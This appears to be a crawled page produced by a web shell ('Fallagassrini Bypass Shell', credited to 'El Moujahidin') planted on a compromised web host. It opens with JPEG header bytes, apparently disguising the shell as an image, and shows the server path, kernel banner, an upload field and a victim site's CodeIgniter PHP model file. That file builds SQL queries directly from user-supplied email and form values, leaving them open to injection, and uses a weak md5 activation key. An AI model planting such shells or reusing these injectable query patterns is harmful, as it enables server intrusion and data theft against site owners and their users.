JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/models/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/models/email_already.php

<?php
class Email_already extends CI_Model
{

	public function __construct()
	{
		parent::__construct();
		$this->load->library('email');
		$this->load->database();
		$this->load->helper(array('url','string'));
	}
	public function checked_tenant($email)
	{
		$zr=1;
		$months='';
			$dated=date('Y-m-d');
				$prop=$this->input->post('property_id');
		$months=$this->input->post('no_months');
		$dde=$this->input->post('due_date');
		$az1=$this->db->query("select * from tbl_users where email='$email' and user_type='2' and status='1'");
		$az2=$az1->num_rows();
		$az3=$az1->row_array();
		$pz1=$this->db->query("select * from property_maintenance where tenant='$email' and property<>''");
		$pz2=$pz1->num_rows();
		$tz1=$this->db->query("select * from tenant_property_associated where tenant_id='$email' and property='$prop' and deleted='1'");
		$tz2=$tz1->num_rows();

		if($az2!=0 && $pz2==0 && $tz2==0)
		{
			$var='';
					for($zr=1;$zr<=$months;$zr++)
					{
						$var=$zr*30;
						$dd=date('Y-m-d', strtotime($dde. ' + '.$var.' days'));
			$this->db->query("insert into property_maintenance(landlord,property,added_on,tenant,due_date,no_months,user_status)
															values('".$_SESSION['user_id']."','$prop','$dated','$email','$dd','1','1')");
					}
$this->db->query("insert into tenant_property_associated(landlord,property,added_on,tenant_id,user_status)
															values('".$_SESSION['user_id']."','$prop','$dated','$email','1')");
															$_SESSION['added']="Property has been associated to the Tenant";
?>
<script>
window.location.href="<?php echo base_url(); ?>dashboard";
</script>
<?php 
		}
	/******second else ******/	else{
		
		
		
		$email_already=$this->db->query("select * from tbl_users where email='$email' and user_type='2' and status='0'");
		$iid=$email_already->row_array();
		$count=$email_already->num_rows();

	
		$pr_al=$this->db->query("select * from property_maintenance where tenant='$email' and property<>'' and deleted='0'");
		$prid=$pr_al->num_rows();
	
		if($count>0)
		{		
	
			$key=md5(random_string('numeric',4));
			$this->db->query("insert into temp(email,act_key) values('$email','$key')");
			$this->email->from('kiramiver.com', 'From Landlord');
			 $this->email->to($email);
			 //$this->email->cc();
			 //$this->email->bcc();
			
			$this->email->subject('Email from Landlord');
			$this->email->message("This is a test message . ".base_url()."activate_user/activate/".$key."");
			 $this->email->send();
			//echo $this->email->print_debugger();
			
			$alr=$this->db->query("select * from property_maintenance where tenant='$email' and property<>''");
			$alrd=$alr->num_rows();
			if($alrd>0)
			{
$_SESSION['added']="Property already associated with the Tenant";
		?>
		<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
			</script>
		<?php	
			}else { 

$_SESSION['added']="Property has been associated to the Tenant";
		
				$var='';
					for($zr=1;$zr<=$months;$zr++)
					{
						$var=$zr*30;
						$dd=date('Y-m-d', strtotime($dde. ' + '.$var.' days'));
			$this->db->query("insert into property_maintenance(landlord,property,added_on,tenant,due_date,no_months)
															values('".$_SESSION['user_id']."','$prop','$dated','$email','$dd','1')");
					}
$this->db->query("insert into tenant_property_associated(landlord,property,added_on,tenant_id)
															values('".$_SESSION['user_id']."','$prop','$dated','$email')");
			?>
		<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
			</script>
		<?php		} }

 else 
		{			
	
	if($prid<1)
	{ 
				$_SESSION['added']="Registration Link has been sent  to the Tenant";
			$this->email->from('kiramiver.com', 'From Landlord');
		 $this->email->to($email);
			// $this->email->cc();
			// $this->email->bcc();
			
			$this->email->subject('Email from Landlord');
			 $this->email->message("This is a test message . ".base_url()."register/index/2");
			 $this->email->send();
			//echo $this->email->print_debugger();
				$var='';
					for($zr=1;$zr<=$months;$zr++)
					{
						$var=$zr*30;
						$dd=date('Y-m-d', strtotime($dde. ' + '.$var.' days'));
			$this->db->query("insert into property_maintenance(landlord,property,added_on,tenant,due_date,no_months)
															values('".$_SESSION['user_id']."','$prop','$dated','$email','$dd','1')");
					}
		$this->db->query("insert into tenant_property_associated(landlord,property,added_on,tenant_id)
															values('".$_SESSION['user_id']."','$prop','$dated','$email')");
		?>
		<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
		</script>
<?php 
	} else 
	{ $_SESSION['added']="Property is already associated with the Tenant";
		?>
				<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
		</script>

<?php 	}
}
	
	} /********first_else *************/
	}
	
	
	
	
	
	public function checked_manager($email)
	{
		$email_already=$this->db->query("select * from tbl_users where email='$email' and user_type='3' and status='0'");
		$count=$email_already->num_rows();
				$iid=$email_already->row_array();
							$prop=$this->input->post('property_id');
					$dated=date('Y-m-d');
		$pr_al=$this->db->query("select * from property_maintenance where manager='$email' and property='$prop' ");
		$prid=$pr_al->num_rows();
	
	
			$az1=$this->db->query("select * from tbl_users where email='$email' and user_type='3' and status='1'");
		$az2=$az1->num_rows();
		$az3=$az1->row_array();
		$pz1=$this->db->query("select * from property_maintenance where manager='$email' and property<>''");
		$pz2=$pz1->num_rows();
		$tz1=$this->db->query("select * from property_manager_associated where manager_id='$email'");
		$tz2=$tz1->num_rows();

		if($az2!=0 && $pz2==0 && $tz2==0)
		{
					
			$this->db->query("insert into property_maintenance(landlord,property,added_on,tenant,user_status)
															values('".$_SESSION['user_id']."','$prop','$dated','$email','1')");
			
$this->db->query("insert into property_manager_associated(landlord,property,added_on,manager_id,user_status)
															values('".$_SESSION['user_id']."','$prop','$dated','$email','1')");
															$_SESSION['added']="Property has been associated to the Manager";
?>
<script>
window.location.href="<?php echo base_url(); ?>dashboard";
</script>
<?php 
		}
	/******second else ******/	else{
		
	
	
	
		if($count>0)
		{		
			$key=md5(random_string('numeric',4));
				$this->db->query("insert into temp(email,act_key) values('$email','$key')");
			$this->email->from('kiramiver.com', 'From Landlord');
			$this->email->to($email);
			//$this->email->cc();
			// $this->email->bcc();
			
		$this->email->subject('Email from Landlord');
			 $this->email->message("This is a test message . ".base_url()."activate_user/activate/".$key."");
			 $this->email->send();
			//echo $this->email->print_debugger();

			$alr=$this->db->query("select * from property_maintenance where manager='$email' and property='$prop'");
			$alrd=$alr->num_rows();
			if($alrd>0)
			{
$_SESSION['added']="Property is already associated ";
		?>
		<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
			</script>
		<?php	
			}else { 
$_SESSION['added']="Property has been associated to the Manager";
		
			$this->db->query("insert into property_maintenance(landlord,property,added_on,manager)
															values('".$_SESSION['user_id']."','$prop','$dated','$email')");
															
							$this->db->query("insert into property_manager_associated(landlord,property,added_on,manager_id)
															values('".$_SESSION['user_id']."','$prop','$dated','$email')");
			?>
		<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
			</script>
		<?php		} }

 else 
		{

if($prid<1)
	{ 	
	$_SESSION['added']="Registration Link has been sent  to the Manager";
			 $this->email->from('kiramiver.com', 'From Landlord');
			 $this->email->to($email);
			//$this->email->cc();
			//$this->email->bcc();
			
			 $this->email->subject('Email from Landlord');
			$this->email->message("This is a test message . ".base_url()."register/index/2");
			$this->email->send();
			//echo $this->email->print_debugger();
			
			$this->db->query("insert into property_maintenance(landlord,property,added_on,manager)
															values('".$_SESSION['user_id']."','$prop','$dated','$email')");
			$this->db->query("insert into property_manager_associated(landlord,property,added_on,manager_id)
															values('".$_SESSION['user_id']."','$prop','$dated','$email')");
		?>
		<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
		</script>
<?php  
	} else 
	{
		 $_SESSION['added']="Property is already associated";
		?>
				<script>
			window.location.href="<?php echo base_url(); ?>dashboard";
		</script>
		<?php 
	}
}
	}
	
	}
	
	
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net